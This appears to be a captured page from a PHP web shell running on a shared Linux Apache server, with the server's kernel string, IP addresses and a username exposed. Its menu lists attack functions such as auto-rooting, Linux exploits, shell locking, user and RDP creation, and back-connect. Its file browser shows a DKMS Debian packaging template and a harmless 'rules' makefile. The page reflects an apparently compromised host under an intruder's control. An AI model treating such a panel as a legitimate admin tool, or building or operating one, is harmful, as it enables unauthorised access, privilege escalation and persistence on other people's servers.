Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
dkms /
template-dkms-mkdeb /
debian /
[ HOME SHELL ]
Name
Size
Permission
Action
README.Debian
150
B
-rw-r--r--
changelog
189
B
-rw-r--r--
compat
2
B
-rw-r--r--
control
419
B
-rw-r--r--
copyright
70
B
-rw-r--r--
dirs
8
B
-rw-r--r--
postinst
1.22
KB
-rwxr-xr-x
prerm
360
B
-rwxr-xr-x
rules
881
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rules
#!/usr/bin/make -f # -*- makefile -*- # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 DEB_NAME=DEBIAN_PACKAGE NAME=MODULE_NAME VERSION=MODULE_VERSION configure: configure-stamp configure-stamp: dh_testdir touch configure-stamp build: build-stamp build-stamp: configure-stamp dh_testdir $(MAKE) touch $@ clean: dh_testdir dh_testroot rm -f build-stamp configure-stamp -$(MAKE) clean dh_clean install: build dh_testdir dh_testroot dh_prep dh_installdirs $(MAKE) DESTDIR=$(CURDIR)/debian/$(DEB_NAME)-dkms NAME=$(NAME) VERSION=$(VERSION) install binary-arch: build install binary-indep: build install dh_testdir dh_testroot dh_link dh_strip dh_compress dh_fixperms dh_installdeb dh_shlibdeps dh_gencontrol dh_md5sums dh_builddeb binary: binary-indep binary-arch .PHONY: build clean binary-indep binary-arch binary install configure
Close